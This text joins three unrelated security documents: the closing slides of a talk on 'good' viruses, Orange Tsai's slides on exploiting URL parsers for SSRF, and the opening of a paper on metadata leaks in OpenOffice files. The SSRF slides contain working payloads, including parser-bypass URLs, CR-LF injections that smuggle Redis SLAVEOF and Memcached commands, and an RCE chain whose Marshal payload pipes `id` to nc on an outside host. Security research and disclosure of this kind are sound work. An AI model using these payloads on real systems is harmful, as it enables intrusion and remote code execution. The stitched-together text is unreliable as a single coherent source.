Quicker (and forceful) patching — Remove bad worms — Better administration through computers’ discovery — Support human rights (censorship in China) 31 Patching using replication • Very quick (Warhol and flash) worms • Patching needs to outrun worm propagation • If there is a replicating patch – should it be released? • No, because: — It is technically risky — In a rush there is unlikely to be enough time for proper QA — It is legal minefield too 32 Conclusions • Replicative property is a rather dangerous technology: — Available to everybody — Control is hard (WoW, Nachi) • Can a useful virus be created? Yes. • Is it dangerous? Yes, and more then we expect. • Messing with infections or viral properties? Not a good idea. 33 Key references • Already: — http://home.flash.net/~hoselton/pubs/mah_010.txt • Wow: — http://www.wowwiki.com/Corrupted_Blood — http://www.securityfocus.com/news/11330 — http://www.worldofwarcraft.com/patchnotes/patch1p7.html — http://events.ccc.de/congress/2007/Fahrplan/events/2322.en.html • Nachi: — http://vil.nai.com/vil/content/v_100559.htm — P.Szor “Virus Research and Defense”, Symantec Press, ISBN 0-321-30454-3 • Bad viruses: — http://www.people.frisk-software.com/~bontchev/papers/goodvir.html (by V.Bontchev) — http://www.avertlabs.com/research/blog/index.php/2008/02/18/friendly-worms-facing-frien (and see a comment by V.Bontchev to this blog) • Good viruses: — http://pages.cpsc.ucalgary.ca/~aycock/papers/china.pdf 34 Questions, please Email: mig@mcafee.com
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai Taiwan No.1 About Orange Tsai The most professional red team in Taiwan About Orange Tsai The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai Speaker - Speaker at several security conferences HITCON, WooYun, AVTokyo CTFer - CTFs we won champions / in finalists (as team HITCON) DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF Bounty Hunter - Vendors I have found Remote Code Execution Facebook, GitHub, Uber, Apple, Yahoo, Imgur About Orange Tsai Agenda Introduction Make SSRF great again Issues that lead to SSRF-Bypass Issues that lead to protocol smuggling Case studies and Demos Mitigations What is SSRF? Server Side Request Forgery Bypass Firewall, Touch Intranet Compromise Internal services Struts2 Redis Elastic Protocol Smuggling in SSRF Make SSRF more powerful Protocols that are suitable to smuggle HTTP based protocol Elastic, CouchDB, Mongodb, Docker Text-based protocol FTP, SMTP, Redis, Memcached Quick Fun Example &@ @ &@ @ urllib2 httplib requests urllib Quick Fun Example Python is so Hard Quick Fun Example CR-LF Injection on HTTP protocol Smuggling SMTP protocol over HTTP protocol orange.tw%0D%0AMAIL FROM… >> GET / << 421 4.7.0 ubuntu Rejecting open proxy localhost [] >> HELO orange.tw Connection closed SMTP Hates HTTP Protocol It Seems Unexploitable Gopher Is Good What If There Is No Gopher Support? HTTPS What Won't Be Encrypted in a SSL Handshake? Quick Fun Example□%0D%0AHELO□orange.tw%0D%0AMAIL□FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c + ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange. tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................ CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI□%0D%0AHELO□orange.tw%0D%0AMAIL□FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c + ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange.tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................ Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c + ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange.tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................ Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 >> ...5./.0.,.=.j.8.2.........0...+ << 500 5.5.1 Command unrecognized: ...5./.0.,.=.j.8.2..0.+ >> HELO orange.tw << 250 ubuntu Hello localhost [], please meet you >> MAIL FROM: <admin@orange.tw> << 250 2.1.0 <admin@orange.tw>... Sender ok Make SSRF Great Again URL Parsing Issues It's all about the inconsistency between URL parser and requester Why validating a URL is hard? 1. Specification in RFC2396, RFC3986 but just SPEC 2. WHATWG defined a contemporary implementation based on RFC but different languages still have their own implementations URL Components(RFC 3986) scheme authority path query fragment foo://example.com:8042/over/there?name=bar#nose URL Components(RFC 3986) foo://example.com:8042/over/there?name=bar#nose (We only care about HTTP HTTPS) (It's complicated) (I don't care) (I don't care) scheme authority (It's complicated) path fragment query Big Picture Libraries/Vulns CR-LF Injection URL Parsing Path Host SNI Port Injection Host Injection Path Injection Python httplib 💀 💀 💀 Python urllib 💀 💀 💀 Python urllib2 💀 💀 Ruby Net::HTTP 💀 💀 💀 Java net.URL 💀 💀 Perl LWP 💀 💀 NodeJS http 💀 💀 PHP http_wrapper 💀 💀 Wget 💀 💀 cURL 💀 💀 Consider the following PHP code $url = 'http://' . $_GET[url]; $parsed = parse_url($url); if ( $parsed[port] == 80 && $parsed[host] == 'google.com') { readfile($url); } else { die('You Shall Not Pass'); } Abusing URL Parsers Abusing URL Parsers PHP readfile Perl LWP PHP parse_url Perl URI Abusing URL Parsers RFC3986 authority = [ userinfo "@" ] host [ ":" port ] port = *DIGIT host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~" sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "=" Abusing URL Parsers http://google.com#@evil.com/ Abusing URL Parsers http://google.com#@evil.com/ PHP parse_url PHP readfile Abusing URL Parsers Several programing languages suffered from this issue RFC3968 section 3.2 The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI Abusing URL Parsers How About cURL? http://foo@evil.com:80@google.com/ Abusing URL Parsers http://foo@evil.com:80@google.com/ cURL libcurl NodeJS URL Perl URI Go net/url PHP parse_url Ruby addressable Abusing URL Parsers Report the bug to cURL team and get a patch quickly Bypass the patch with a space Abusing URL Parsers http://foo@ @google.com/ Report Again But… "curl doesn't verify that the URL is 100% syntactically correct. It is instead documented to work with URLs and sort of assumes that you pass it correct input" Won't Fix But previous patch still applied on cURL 7.54.0 Abusing URL Parsers cURL / libcurl PHP parse_url 💀 Perl URI 💀 Ruby uri Ruby addressable 💀 NodeJS url 💀 Java net.URL Python urlparse Go net/url 💀 Consider the following NodeJS code NodeJS Unicode Failure var base = "http://orange.tw/sandbox/"; var path = req.query.path; if (path.indexOf("..") == -1) { http.get(base + path, callback); } NodeJS Unicode Failure http://orange.tw/sandbox/NN/passwd NodeJS Unicode Failure http://orange.tw/sandbox/\xFF\x2E\xFF\x2E/passwd NodeJS Unicode Failure http://orange.tw/sandbox/\xFF\x2E\xFF\x2E/passwd NodeJS Unicode Failure http://orange.tw/sandbox/../passwd / is new ../ (in NodeJS HTTP) (U+FF2E) Full width Latin capital letter N What the ____ NodeJS Unicode Failure HTTP module prevents requests from CR-LF Injection Encode the New-lines as URL encoding\r\nSLAVEOF orange.tw 6379\r\n $ nc -vvlp 6379 >> GET /%0D%0ASLAVEOF%20orange.tw%206379%0D%0A HTTP/1.1 >> Host: >> Connection: close NodeJS Unicode Failure HTTP module prevents requests from CR-LF Injection Break the protections by Unicode U+FF0D U+FF0A*SLAVEOF@orange.tw@6379-* $ nc -vvlp 6379 >> GET / >> SLAVEOF orange.tw 6379 >> HTTP/1.1 >> Host: >> Connection: close GLibc NSS Features In Glibc source code file resolv/ns_name.c#ns_name_pton() /*% * Convert an ascii string into an encoded domain name as per RFC1035. */ int ns_name_pton(const char *src, u_char *dst, size_t dstsiz) GLibc NSS Features RFC1035 - Decimal support in gethostbyname() void main(int argc, char **argv) { char *host = "or\\097nge.tw"; struct in_addr *addr = gethostbyname(host)->h_addr; printf("%s\n", inet_ntoa(*addr)); } … GLibc NSS Features >>> import socket >>> host = '\\o\\r\\a\\n\\g\\e.t\\w' >>> print host \o\r\a\n\g\e.t\w >>> socket.gethostbyname(host) '' RFC1035 - Decimal support in gethostbyname() GLibc NSS Features void main(int argc, char **argv) { struct addrinfo *res; getaddrinfo(" foo", NULL, NULL, &res); struct sockaddr_in *ipv4 = (struct sockaddr_in *)res->ai_addr; printf("%s\n", inet_ntoa(ipv4->sin_addr)); } … Linux getaddrinfo() strip trailing rubbish followed by whitespaces GLibc NSS Features Linux getaddrinfo() strip trailing rubbish followed by whitespaces Lots of implementations relied on getaddrinfo() >>> import socket >>> socket.gethostbyname("\r\nfoo") '' GLibc NSS Features Exploit Glibc NSS features on URL Parsing\tfoo.google.com GLibc NSS Features Exploit Glibc NSS features on URL Parsing Why this works? Some library implementations decode the URL twice… Exploit Glibc NSS features on Protocol Smuggling HTTP protocol 1.1 required a host header $ curl -vvv http://I-am-a-very-very-weird-domain.com >> GET / HTTP/1.1 >> Host: I-am-a-very-very-weird-domain.com >> User-Agent: curl/7.53.1 >> Accept: */* GLibc NSS Features GLibc NSS Features Exploit Glibc NSS features on Protocol Smuggling HTTP protocol 1.1 required a host header\r\nSLAVEOF orange.tw 6379\r\n:6379/ $ nc -vvlp 6379 >> GET / HTTP/1.1 >> Host: >> SLAVEOF orange.tw 6379 >> :6379 >> Connection: close GLibc NSS Features\r\nSET foo 0 60 5\r\n:443/ $ nc -vvlp 443 >> ..=5</.Aih9876.'. #...$...?...).%..g@?>3210...EDCB.. >> .....5'%" >> SET foo 0 60 5 Exploit Glibc NSS features on Protocol Smuggling SNI Injection - Embed hostname in SSL Client Hello Simply replace HTTP to HTTPS GLibc NSS Features Break the Patch of Python CVE-2016-5699 CR-LF Injection in HTTPConnection.putheader() Space followed by CR-LF? _is_illegal_header_value = \ re.compile(rb'\n(?![ \t])|\r(?![ \t\n])').search … if _is_illegal_header_value(values[i]): raise ValueError('Invalid header value %r' % (values[i],)) Break the Patch of Python CVE-2016-5699 CR-LF Injection in HTTPConnection.putheader() Space followed by CR-LF? Bypass with a leading space >>> import urllib >>> url = 'http://0\r\n SLAVEOF orange.tw 6379\r\n :80' >>> urllib.urlopen(url) GLibc NSS Features Break the Patch of Python CVE-2016-5699 Exploit with a leading space Thanks to Redis and Memcached GLibc NSS Features http://0\r\n SLAVEOF orange.tw 6379\r\n :6379/ >> GET / HTTP/1.0 << -ERR wrong number of arguments for 'get' command >> Host: 0 << -ERR unknown command 'Host:' >> SLAVEOF orange.tw 6379 << +OK Already connected to specified master Abusing IDNA Standard The problem relied on URL parser and URL requester use different IDNA standard IDNA2003 UTS46 IDNA2008 ⓖⓞⓞⓖⓛⓔ.com google.com google.com Invalid g\u200Doogle.com google.com google.com xn--google-pf0c.com baß.de bass.de bass.de xn--ba-hia.de Abusing IDNA Standard >> "ß".toLowerCase() "ß" >> "ß".toUpperCase() "SS" >> ["ss", "SS"].indexOf("ß") false >> location.href = "http://wordpreß.com" The problem relied on URL parser and URL requester use different IDNA standard Case Studies Abusing URL Parsers - Case Study WordPress 1. Paid lots of attentions on SSRF protections 2. We found 3 distinct ways to bypass the protections 3. Bugs have been reported since Feb. 25, 2017 but still unpatched 4. For the Responsible Disclosure Process, I will use MyBB as following case study Abusing URL Parsers - Case Study The main concept is finding different behaviors among URL parser, DNS checker and URL requester URL parser DNS checker URL requester WordPress parse_url() gethostbyname() *cURL vBulletin parse_url() None *cURL MyBB parse_url() gethostbynamel() *cURL * First priority Abusing URL Parsers - Case Study SSRF-Bypass tech #1 Time-of-check to Time-of-use problem 1 $url_components = @parse_url($url); 2 if( 3 !$url_components || 4 empty($url_components['host']) || 5 (!empty($url_components['scheme']) && !in_array($url_components['scheme'], array('http', 'https'))) || 6 (!empty($url_components['port']) && !in_array($url_components['port'], array(80, 8080, 443))) 7 ) { return false; } 8 9 $addresses = gethostbynamel($url_components['host']); 10 if($addresses) { 11 // check addresses not in disallowed_remote_addresses 12 } 13 14 $ch = curl_init(); 15 curl_setopt($ch, CURLOPT_URL, $url); 16 curl_exec($ch); Abusing URL Parsers - Case Study 1. gethostbyname() and get 2. Check not in blacklist 3. Fetch URL by curl_init() and cURL query DNS again! 4. fetched, SSRF! Q: foo.orange.tw A: Q: foo.orange.tw A: http://foo.orange.tw/ Hacker MyBB DNS 1 2 4 3 Abusing URL Parsers - Case Study SSRF-Bypass tech #2 The inconsistency between DNS checker and URL requester There is no IDNA converter in gethostbynamel(), but cURL has 1 $url = 'http://ß.orange.tw/'; // 2 3 $host = parse_url($url)[host]; 4 $addresses = gethostbynamel($host); // bool(false) 5 if ($address) { 6 // check if address in white-list 7 } 8 9 $ch = curl_init(); 10 curl_setopt($ch, CURLOPT_URL, $url); 11 curl_exec($ch); Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester Fixed in PHP 7.0.13 … fetched $url = ''; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(80) curl($url); Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester Fixed in cURL 7.54 (The version of libcurl in Ubuntu 17.04 is still 7.52.1) $url = 'http://foo@'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(80) curl($url); … fetched Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester cURL won't fix :) $url = 'http://foo@ @google.com:11211/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(11211) curl($url); … fetched Protocol Smuggling - Case Study GitHub Enterprise Standalone version of GitHub Written in Ruby on Rails and code have obfuscated Protocol Smuggling - Case Study About Remote Code Execution on GitHub Enterprise Best report in GitHub 3 rd Bug Bounty Anniversary Promotion! Chaining 4 vulnerabilities into RCE $12,500 awarded Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks What is Webhooks? Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks Fetching URL by gem faraday Blacklisting Host by gem faraday-restrict-ip-addresses Blacklist localhost,… ETC Simply bypassed with a zero http://0/ Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks There are several limitations in this SSRF Not allowed 302 redirection Not allowed scheme out of HTTP and HTTPS No CR-LF Injection in faraday Only POST method Protocol Smuggling - Case Study Second bug - SSRF in internal Graphite service GitHub Enterprise uses Graphite to draw charts Graphite is bound on url = request.GET['url'] proto, server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() SSRF Execution Chain : ( Protocol Smuggling - Case Study Third bug - CR-LF Injection in Graphite Graphite is written in Python The implementation of the second SSRF is httplib.HTTPConnection As I mentioned before, httplib suffers from CR-LF Injection We can smuggle other protocols with URL http://0:8000/composer/send_email ?to=orange@chroot.org &url=… Protocol Smuggling - Case Study Fourth bug - Unsafe Marshal in Memcached gem GitHub Enterprise uses Memcached gem as the cache client All Ruby objects stored in cache will be Marshal-ed Protocol Smuggling - Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url= ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data Protocol Smuggling - Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url= ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data Demo GitHub Enterprise < 2.8.7 Remote Code Execution https://youtu.be/GoO7_lCOfic Mitigations Application layer Use the only IP and hostname, do not reuse the input URL Network layer Using Firewall or NetWork Policy to block Intranet traffics Projects SafeCurl by @fin1te Advocate by @JordanMilne Summary New Attack Surface on SSRF-Bypass URL Parsing Issues Abusing IDNA Standard New Attack Vectors on Protocol Smuggling Linux Glibc NSS Features NodeJS Unicode Failure Case Studies Further works URL parser issues in OAuth URL parser issues in modern browsers URL parser issues in proxy server … Acknowledgements 1. Invalid URL parsing with '#' by @bagder 2. URL Interop by @bagder 3. Shibuya.XSS #8 by @mala 4. SSRF Bible by @Wallarm 5. Special Thanks Allen Own Birdman Chiu Henry Huang Cat Acknowledgements https://twitter.com/harapeko_lady/status/743463485548355584 https://tuswallpapersgratis.com/gato-trabajando/ https://carpet.vidalondon.net/cat-in-carpet/ Meme Websites… Thanks orange@chroot.org @orange_8361
Disclosing Private Information from Metadata, hidden info and lost data Chema Alonso, Enrique Rando, Francisco Oca and Antonio Guzmán Abstract — Documents contain metadata and hidden information that can be used to disclose private data and to fingerprint an organization and its network computers. This document shows what kinds of data can be found, how to extract them and proposes some solutions to the problem stated here. Index Terms — Metadata, fingerprinting, security, privacy —————————— —————————— 1 INTRODUCTION he collaborative work in on documents justifies the need of an extra information attached to the documents, in order to allow coherent and consistent results. In an environment where social networks make the sharing of resources such an important issue, it is necessary to store information about documents authors, the computers used to edit the documents, software versions, printers where they were printed, and so on. Then, if necessary, it will be possible, to prove the authorship of a concrete piece of information, to undo the last changes, to recover a previous version of a document or even to settle responsibilities when authorities want to investigate, for example, the management of the digital rights. The techniques used to attach this extra information to a document, without interfering with its content, are based on Metadata. The concept of Metadata can be understood as information about the data. But it can also be understood as a structured description, optionally available to the general public, which helps to locate, identify, access and manage objects. Since Metadata are themselves data, it would be possible to define Metadata about Metadata too. This can be very useful, for example, when a given document has been the result of merging two or more previous documents. The most frequent objective of Metadata is the optimization of Internet searches. The additional information provided by Metadata allows to perform more accurate searches and to simplify the development of filters. Therefore, Metadata emerge as a solution to human-computer communication, describing the content and structure of the data. Furthermore, Metadata facilitate further conversion to different data formats and variable data presentation according to the environment features. Metadata are classified using two different criteria: content and variability. The first classification is the most widely used. You can easily distinguish among Metadata used to describe a resource and Metadata used to describe the content of the resource. It is possible to split these two groups once more, for example, to separate Metadata used to describe the meaning of the contents from those used to describe the structure of the content; or to separate Metadata used to describe the resource itself from those which describe the life cycle of the resource, and so on. In terms of variability, on the other hand, the Metadata can be mutable or immutable. Obviously, the immutable Metadata do not change, a typical example would be the name of a file. T Disclosing Private Information from Metadata, hidden info and lost data Page 2 of 29 The generation of Metadata can be manual or automatic. The manual process can be very laborious, depending on the format used for the Metadata and on their desired volume. In the automatic generation, software tools acquire the information they need without external help. However, only in few cases we can have a completely automatic Metadata generation, because some information is very difficult to extract with software tools. The most common techniques use a hybrid generation that starts with the resource generation itself. If the information changes Metadata must change too. When the modifications are simple enough, they can be carried out automatically. But when the complexity increases, the modifications usually require the intervention of a person. In addition, the destruction of Metadata must be managed. In some cases, it is necessary to eliminate the Metadata along with their correspondent resources; in others, it is reasonable to preserve the Metadata after the resource destruction, for example, to monitor changes in a text document. But the most critical situation is the destruction of Metadata when they are related to a final resource version intended for publication. The main contribution of this work is a research about what kind of information stored as Metadata in the public documents on the Internet is not destroyed and how this information can be used as a basis for fingerprinting techniques. We have selected two kinds of documents very usual on the web: Microsoft Office documents and OpenOffice documents. 2 METADATA AND HIDDEN INFORMATION IN OPENOFFICE DOCUMENTS 2.1 ODF FILES ODF (Open Document Format) is the native file format used by OpenOffice, an open standard format, defined by OASIS and approved by ISO. In ODF, documents are stored as compressed ZIP archives containing a set of XML files with the document contents. If you use compression software to open an ODT document (text file created with OpenOffice Writer) you can find the following files: • meta.xml: Metadata related to the document. This file is not encrypted even if the document is password protected. • settings.xml: Information related to the document configuration and parameters. • content.xml: File with the main content of the document, therefore, the text. Figure 1: ODT file contents Disclosing Private Information from Metadata, hidden info and lost data Page 3 of 29 Although OpenOffice version 1 uses different file extensions than OpenOffice 2, documents are stored in a similar way in both versions. Do not forget that ODF was built as an evolution of the file formats used in OpenOffice 1. 2.2 PERSONAL DATA The first metadata generated using OpenOffice are created during the software installation and first execution. The software suite asks the user a set of personal data which, by default, will be attached to the documents created with this software. Figure 2: User data modification Some of these data will be stored within the documents created by OpenOffice. If we create a new text document and afterwards check the contents of the generated meta.xml file, we will find the following information: <?xml version="1.0" encoding="UTF-8" ?> -<office:document-meta xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:ooo="http://openoffice.org/2004/office" office:version="1.0"> - <office:meta> <meta:generator>OpenOffice.org/2.3$Win32 OpenOffice.org_project/680m5$Build- 9221</meta:generator> <meta:initial-creator>MiNombre MiApellido</meta:initial-creator> <meta:creation-date>2008-08-11T11:33:23</meta:creation-date> <meta:editing-cycles>0</meta:editing-cycles> <meta:editing-duration>PT0S</meta:editing-duration> <meta:user-defined meta:name="Info 1" /> <meta:user-defined meta:name="Info 2" /> <meta:user-defined meta:name="Info 3" /> <meta:user-defined meta:name="Info 4" /> <meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="0" meta:word-count="0" meta:character-count="0" /> </office:meta> </office:document-meta> Figure 3: meta.xml file We can find information about the OpenOffice version, the operating system, and, within personal data, about the user name. Perhaps we want to show this information or maybe not. A user or a company should decide about it before publishing the document on the Internet, before mailing it or before making it public by any other method. Disclosing Private Information from Metadata, hidden info and lost data Page 4 of 29 2.3 PRINTERS Among the data that can be potentially dangerous, because it reveals information about the company infrastructure, we have printer data. When you print a document with OpenOffice, and after it, you save the document; its settings.xml file stores information about the printer that has been used. … <config:config-item config:name="ClipAsCharacterAnchoredWriterFlyFrames" config:type="boolean">false</config:config-item> <config:config-item config:name="CurrentDatabaseDataSource" config:type="string" /> <config:config-item config:name="DoNotCaptureDrawObjsOnPage" config:type="boolean">false</config:config-item> <config:config-item config:name="TableRowKeep" config:type="boolean">false</config:config- item> <config:config-item config:name="PrinterName" config:type="string">EPSON Stylus DX4000 Series</config:config-item> <config:config-item config:name="PrintFaxName" config:type="string" /> <config:config-item config:name="ConsiderTextWrapOnObjPos" config:type="boolean">false</config:config-item> <config:config-item config:name="UseOldPrinterMetrics" config:type="boolean">false</config:config-item> … Figure 4: printer information in settings.xml file This information may be important because it can denounce a forbidden action performed by a user or point directly to a specific user or machine uniquely. In terms of security this information could be even worse if the printer is shared on a server: … <config:config-item config:name="ClipAsCharacterAnchoredWriterFlyFrames" config:type="boolean">false</config:config-item> <config:config-item config:name="CurrentDatabaseDataSource" config:type="string" /> <config:config-item config:name="DoNotCaptureDrawObjsOnPage" config:type="boolean">false</config:config-item> <config:config-item config:name="TableRowKeep" config:type="boolean">false</config:config- item> <config:config-item config:name="PrinterName" config:type="string">\\servidor\HP 2000C </config:config-item> <config:config-item config:name="PrintFaxName" config:type="string" /> <config:config-item config:name="ConsiderTextWrapOnObjPos" config:type="boolean">false</config:config-item> <config:config-item config:name="UseOldPrinterMetrics" config:type="boolean">false</config:config-item> … Figure 5: Printer information described in UNC format in settings.xml file In this case, the printer appears in UNC format (Universal Naming Service), revealing both the server name and the correspondent resource. These data, for example, could be used by attackers to know the infrastructure of the internal network and to create a list of possible targets. 2.5 TEMPLATES Templates are used to generate documents with predefined styles and formats. They are widely used because they allow using corporate documents and images comfortably. However, when a document is generated from a template, it stores references to the path location of the template in the meta.xml file: <?xml version="1.0" encoding="UTF-8" ?> - <office:document-meta xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:ooo="http://openoffice.org/2004/office" office:version="1.0"> - <office:meta> <meta:generator>OpenOffice.org/2.3$Win32 OpenOffice.org_project/680m5$Build- 9221</meta:generator> Disclosing Private Information from Metadata, hidden info and lost data Page 5 of 29 <dc:title>NuevaPlantilla</dc:title> <meta:initial-creator>MiNombre MiApellido</meta:initial-creator> <meta:creation-date>2008-08-12T10:02:14</meta:creation-date> <meta:editing-cycles>1</meta:editing-cycles> <meta:editing-duration>PT0S</meta:editing-duration> <meta:template xlink:type="simple" xlink:actuate="onRequest" xlink:href="../../Datos%20de%20programa/OpenOffice.org2/user/template/NuevaPlan tilla.ott" xlink:title="NuevaPlantilla" meta:date="2008-08-12T10:02:14" /> <meta:user-defined meta:name="Info 1" /> <meta:user-defined meta:name="Info 2" /> <meta:user-defined meta:name="Info 3" /> <meta:user-defined meta:name="Info 4" /> <meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="0" meta:character-count="9" /> </office:meta> </office:document-meta> Figure 6: Path to template in meta.xml file In the meta.xml file you can see the path to the template relative to the document location. This path may seem harmless and lacking the information that could put the system security at risk. However, if the document is stored in a folder located outside the user's profile, this path offers information about the user account. ... <meta:template xlink:type="simple" xlink:actuate="onRequest" xlink:href="../Documents%20and%20Settings/UserAccount/Datos%20de%20programa/OpenOffice .org2/user/template/NuevaPlantilla.ott" xlink:title="NuevaPlantilla" meta:date="2008-08- 12T10:02:14" /> <meta:user-defined meta:name="Info 1" /> ... Figure 7: Path to template in user’s profile in meta.xml file In this case, the document has been stored in "C: \" and as a result, the path to the template reveals the folder that contains the user's profile in "C: \ Documents and Settings". The name of this folder is usually the name of the user account, in this example "UserAccount." It should be noted that, in certain cases, the name of this folder contains data about the domain to which the user belongs. This information is usually included in the name of the folder with the user's profile with the structure "UserAccount.DomainName" offering critical information to a potential attacker. Similarly, the document could have been saved on another drive different from the template, obtaining in this case a complete path to identify the disk drive: … <meta:template xlink:type="simple" xlink:actuate="onRequest" xlink:href="/C:/Documents%20and%20Settings/papa/Datos%20de%20programa/OpenOffice.org2/u ser/template/NuevaPlantilla.ott" xlink:title="NuevaPlantilla" meta:date="2008-08-12T10:02:14" /> <meta:user-defined meta:name="Info 1" /> … Figure 8: Full path to template in meta.xml file Examples shown above have all been performed on Windows machines, but the results do not differ much in Linux machines. In this case, paths to templates can contain information about user’s $HOME Path: … <meta:template xlink:type="simple" xlink:actuate="onRequest" xlink:role="template" xlink:href="/home/pruebas/.openoffice.org2/user/template/PlantillaNueva.ott" xlink:title="NuevaPlantilla" meta:date="2008-06-30T09:13:20" /> <meta:user-defined meta:name="Info 1" /> … Figure 9: Full path to template related to $HOME in meta.xml file Logically, if the template is located on a network server, the information in UNC format shows the server’s name and the shared resource, again allowing a potential attacker to reconstruct the network structure of the organization. Disclosing Private Information from Metadata, hidden info and lost data Page 6 of 29 2.6 EMBEDDED AND LINKED DOCUMENTS One of the options provided by almost all of the current office software is linking and embedding documents. In the case of linking files, there is a reference to the linked document in the main document, in the form of a relative path, when it is possible, and as an absolute path when there is no other alternative. If the document is linked on the same computer where the main document is, the result will be, in general, similar the results shown in the last section. Therefore, a potential attacker could disclose sensitive information about user accounts or file locations. If the linked document is stored on another computer, the information disclosed to the attacker is very useful again: … <text:p text:style-name="Standard"> <draw:frame draw:style-name="fr1" draw:name="gráficos1" text:anchor-type="paragraph" svg:width="16.999cm" svg:height="6.369cm" draw:z-index="0"> <draw:image xlink:href="//desktop/confidenciales/Dibujo.bmp" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:filter-name="<Todos los formatos>" /> </draw:frame> </text:p> … Figure 10: Linked document When the file is embedded in the document, not linked, there are not routes implied in the process, but we have to face new potential problems of leakage of information, because they may contain metadata and hidden information. Suppose that we embed a JPG image (with its metadata in EXIF format) in an ODF document. In the example, one of such EXIF metadata is a miniature that looks different from the embedded image, thus showing that the image has been manipulated. All the embedded files are included in the master document, so opening the ODT file with a decompressor, you can see that there is a folder called Pictures, and inside it is the embedded image, but under another name. Figure 11: Embedded image in Pictures folder If this image is extracted and analyzed, it has all the original image’s metadata attached and, of course, the thumbnail that shows its original state. It´s possible to use any EXIF reader tool to analyze the thumbnail attached to the pictured to prove this as can be seen in Figure 12. Figure 6 EXIF Metadata from an embedded image Disclosing Private Information from Metadata, hidden info and 